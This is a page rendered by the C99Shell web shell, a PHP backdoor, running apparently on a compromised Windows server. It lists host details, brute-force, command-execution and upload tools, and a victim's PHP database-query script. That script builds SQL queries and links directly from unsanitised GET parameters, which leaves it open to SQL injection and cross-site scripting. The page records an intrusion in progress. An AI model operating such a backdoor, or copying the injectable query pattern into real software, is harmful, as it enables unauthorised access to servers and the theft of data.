!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\SRHS\suelos\   drwxrwxrwx
Free 10.1 GB of 239.26 GB (4.22%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     consulta_suelosold.php (2.49 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php 

include ("conex.php");


/*
echo $_GET['tipo'];
echo $_GET['no'];
echo $_GET['usuario'];
echo $_GET['sector'];
echo $_GET['fecha'];
echo $_GET['resuelve'];
*/

if($_GET['no'] != ""){
$sqlno= " and no  = '$_GET[no]'";
}
if($_GET['solicitante'] != ""){
$sqlsolicitante= " and solicitante like '%$_GET[solicitante]%'";
}
if($_GET['fecha_concepto'] != ""){
$sqlfecha_concepto= " and year( fecha_concepto ) = '$_GET[fecha_concepto]'";

}
if($_GET['objeto'] != ""){
$sqlobjeto= " and objeto like '%$_GET[objeto]%'";
}
if($_GET['radicado_entrada'] != ""){
$sqlradicado_entrada= " and radicado_entrada = '$_GET[radicado_entrada]'";
}
$order = " order by no desc";	

$sqlt = "select id,radicado_entrada,DATE_FORMAT(fecha_entrada,'%d-%m-%Y') AS fecha_entrada,solicitante,cargo,entidad,no,DATE_FORMAT(fecha_concepto,'%d-%m-%Y') AS fecha_concepto,objeto,radicado_salida,DATE_FORMAT(fecha_salida,'%d-%m-%Y') AS fecha_salida,abogado,observaciones from conceptos where publicacion='s' "; 

$sqldef=$sqlt.$sqlid.$sqlradicado_entrada.$sqlno.$sqlfecha_concepto.$sqlobjeto.$sqlsolicitante.$sqlcargo.$sqlentidad.$sqlradicado_salida. 
$sqlabogado.$sqlfecha_salida.$order;
//echo "$sqldef...";
//echo "á..";




$sql=mysql_query($sqldef,$con);

$num_rows = mysql_num_rows($sql);
//muestra los datos consultados
echo "<table>
	<caption>
	<h5>Conceptos Jurídicos Encontrados: $num_rows </h5></caption>
	<thead>
	<tr class='odd'>

		<th scope='col' abbr='Home'><h5><span></span>No.</h5></th>
		<th scope='col' abbr='Home'><h5><span></span>Fecha</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Solicitante</h5></th>
		<th scope='col' abbr='Home'><h5><span></span>Rad. Salida</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Objeto</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Descargar</h5></th>
        

	</tr>	
	</thead>
	<tfoot>";
while($row = mysql_fetch_array($sql)){

$cont=$cont+1;

if ($cont % 2 == 0)
$class= "class='odd'";

if ($cont % 2 == 1)
$class= "";

$year1=date("Y", strtotime($_GET['fecha']));
$ip = 'http://190.27.245.106/BLA';
$acto=ucfirst(strtolower($_GET['tipo']));
echo "
<tr $class>
		<th>$row[no]</th>
		<td>$row[fecha_concepto]</td>
		<td>$row[solicitante]</td>
		<td>$row[radicado_salida]</td>
		<td>$row[objeto]</td>
		<td><A href='conceptos/$_GET[fecha_concepto]/$row[no].pdf' target=_blank><img src='images/pdf.gif' width='32' height='32' border='0' align='absmiddle' /></a></td>
		
		";
		
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--